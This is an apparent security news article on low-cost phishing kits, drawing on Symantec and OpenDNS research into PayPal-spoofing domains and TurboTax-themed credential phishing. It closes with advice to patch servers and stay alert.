Phishing Kits Hook Victims in Attacks

Fishing successfully in a lake requires patience. Phishing successfully in cyberspace however takes only a few dollars of investment.

According to Symantec, scammers can buy phishing kits for between $2 and $10. These kits do not always require technical skill to use – with just basic knowledge of PHP, attackers can customize their phishing pages to meet their needs, blogged Symantec’s Roberto Sponchioni.

“Some of the kits that we observed were quite basic and only included two web pages,” he blogged. “However, others appeared to be more professional and convincing, with more than 25 PHP source files and 14 different language files that can be loaded based on the user’s location. Scammers can use some of the more professional kits to not only steal user names and passwords, but also personal data such as names, surnames, dates of birth, credit card numbers, CVV numbers, Social Security numbers, and much more. These phishing kits can be used to mimic the appearance of popular websites belonging to companies involved in cloud storage, banking, email, and more.”

The scammers sometimes attempt to compromise legitimate content management systems (CMS) or blogs in order to install the kit on servers, Sponchioni  explained. Attackers often build automated scripts to exploit vulnerabilities in order to compromise as many servers as possible, he noted. 

“If the scammer doesn’t know how to compromise a site, they could rent a bullet-proof server or use a free hosting space to host their phishing kit,” he added. “Once the scammer has set up the kit, they then need to install a Simple Mail Transfer Protocol (SMTP) mailer so that they can import a list of users’ emails and send the phishing messages in bulk.”

Recently, researchers with OpenDNS revealed that they detected multiple domains created to impersonate the PayPal website as part of an email phishing campaign. One of the primary websites (redirectly-paypal.com) was registered Jan. 25 through Wix.com. One of the fraudulent domains (security-paypal-center.com), which has been dormant since its expiration in 2005, was re-registered Jan. 22 through Wix.com as well, according to OpenDNS. In addition, the firm also found many other PayPal-related spoofing domains.

“Most of the phishing sites these days leverage a kit to generate the content,” Andrew Hay, senior security research lead with OpenDNS, said in a statement. “We have it on good authority, from our contacts at PayPal, that the kits being used in this case were quite sophisticated when compared to others that they have seen previously. This kit makes the creation of fraudulent sites a relatively easy endeavor, as opposed to direct copy and pasting of code from the legitimate website.”

“We identified five sites within a one week research window that shared a similar level of sophistication,” he added.

Phishers don’t wait long to jump on current events either. Researchers at Symantec spotted attackers taking advantage of the recent news surrounding Intuit’s TurboTax. Last week, Intuit briefly suspended e-filing of state income tax returns through TurboTax in response to a spike in fraudulent tax returns.

“Scammers have been masquerading as TurboTax in an attempt to phish account credentials of TurboTax users,” blogged Symantec’s Satnam Narang. “The email begins with “Dear TurboTax User,” a common red flag that the email did not originate from TurboTax, as legitimate emails would address the user by their name. From there, the email gets straight to the point by asking the recipient to verify their identity to ensure uninterrupted service and prevent illegal activity. It provides instructions on how to do so, specifying that they need a modern browser with JavaScript enabled. The email contains an “attached form,” an HTML attachment that borrows source code and elements from the real TurboTax website.”

Sponchioni suggested server owners keep their server’s software and CMS up-to-date and recommended end users stay alert.

“Phishing kits are becoming easier to find and use, potentially encouraging would-be scammers to steal information from users,” he blogged. “Users should remain cautious of phishing attempts and ensure that they safeguard their personal data.”